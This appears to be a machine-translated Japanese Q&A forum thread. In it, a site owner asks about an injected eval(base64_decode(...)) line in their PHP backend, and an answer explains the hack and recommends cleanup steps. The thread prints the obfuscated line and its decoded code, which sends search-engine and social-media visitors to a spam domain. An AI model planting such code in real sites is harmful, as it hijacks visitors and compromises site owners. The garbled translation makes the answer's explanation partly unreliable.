のeval（BASE64_DECODEは、私が働いている

Question

バックエンドのページをハックラインを注入されているようだ - はeval（BASE64_DECODE（「CgplcnJvcl9yZXBvcnRpbmcoMCk7C ...

とbase64文字列が

error_reporting(0); 
$nccv=headers_sent(); 
if (!$nccv){ 
    $referer=$_SERVER['HTTP_REFERER']; 

    if (stristr($referer,"aol.com") 
    or stristr($referer,"yahoo") 
    or stristr($referer,"google") 
    or stristr($referer,"bing") 
    or stristr($referer,"ask.com") 
    or stristr($referer,"msn") 
    or stristr($referer,"live") 
    or stristr($referer,"facebook") 
) { 
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")) { 
     header("Location: http://lovemypants.co.cc/"); 
     exit(); 
    } 
    } 
} 

にデコードします

この質問を書いている時点では、私はプログラミングとSOの両方のノブであり、コードの意味とその影響について知りたがっています。

Answer 1

あなたは、リスク分析を探していたら、私はあなたに言うことができます実際の訪問であり、検索エンジンからリダイレクトされない場合、e「ハック」は訪問者をlovemypants.co.ccにリダイレクトするだけです。

今...を、ハックを削除し、あなたのパスワードを変更し、セットアップ公開鍵認証を、あなたのサーバーは、彼らがやっていることを知っている誰かによって保護を受ける、と定期的なバックアップはを設定します。

_{（次回ください実際は、質問をお書きください。）}